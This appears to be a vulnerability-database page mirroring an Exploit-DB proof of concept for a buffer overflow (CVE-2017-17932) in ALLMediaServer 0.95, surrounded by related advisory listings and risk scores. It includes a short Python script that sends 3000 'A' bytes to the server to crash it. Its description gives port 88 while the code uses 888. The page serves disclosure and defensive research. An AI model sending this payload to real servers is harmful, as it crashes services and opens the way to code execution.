Lucene search
K

ALLMediaServer 0.95 - Buffer Overflow (PoC)

🗓️ 27 Dec 2017 00:00:00Reported by Aloyce J. MakalangaType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 36 Views

Buffer overflow vulnerability in ALLMediaServer 0.95 allows remote code execution and denial of servic

Related
Code
ReporterTitlePublishedViews
Family
0day.today
ALLMediaServer 0.95 - Buffer Overflow Exploit
27 Dec 201700:00
zdt
0day.today
ALLMediaServer 0.95 - Buffer Overflow Exploit
12 Jan 201800:00
zdt
ATTACKERKB
CVE-2022-28381
3 Apr 202219:15
attackerkb
Circl
CVE-2017-17932
29 May 201815:50
circl
CNVD
ALLPlayer ALLMediaServer MediaServer.exe File Buffer Overflow Vulnerability
28 Dec 201700:00
cnvd
CVE
CVE-2017-17932
28 Dec 201706:00
cve
Cvelist
CVE-2017-17932
28 Dec 201706:00
cvelist
Exploit DB
ALLMediaServer 0.95 - Remote Buffer Overflow
11 Jan 201800:00
exploitdb
exploitpack
ALLMediaServer 0.95 - Buffer Overflow (PoC)
27 Dec 201700:00
exploitpack
exploitpack
ALLMediaServer 0.95 - Remote Buffer Overflow
11 Jan 201800:00
exploitpack
Rows per page
# Exploit Title: Buffer  overflow in ALLPlayer ALLMediaServer 0.95 and earlier
# CVE: CVE-2017-17932
# Date: 27-12-2017 
# Exploit Author: Aloyce J. Makalanga
# Contact: https://twitter.com/aloycemjr
# Vendor Homepage: http://www.allmediaserver.org/
# Category: webapps
# Attack Type: Remote
# Impact: Code execution and/or Denial of Service 



 
#1. Description
#
#A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause denial of service on the victim machine/computer via a long string to TCP port 88. Te exploit this vulnerability, an attacker must connect to the server with a long-malicious string.
#
#   
#2. Proof of Concept
#
 

#!/usr/bin/python

#NOTE: I found this bug via patch-diffing and I had IDA Pro set up as my Just-In-Time debugger at the time of the crash but any debugger should work. 

def main():

   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

   s.connect(('192.168.205.131', 888))

   buffer = "A" * 3000


   s.send(buffer)

   s.close()


if __name__ == '__main__':
   import socket

   main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Dec 2017 00:00Current
9.4High risk
Vulners AI Score9.4
CVSS 39.8
CVSS 210
EPSS0.77388
36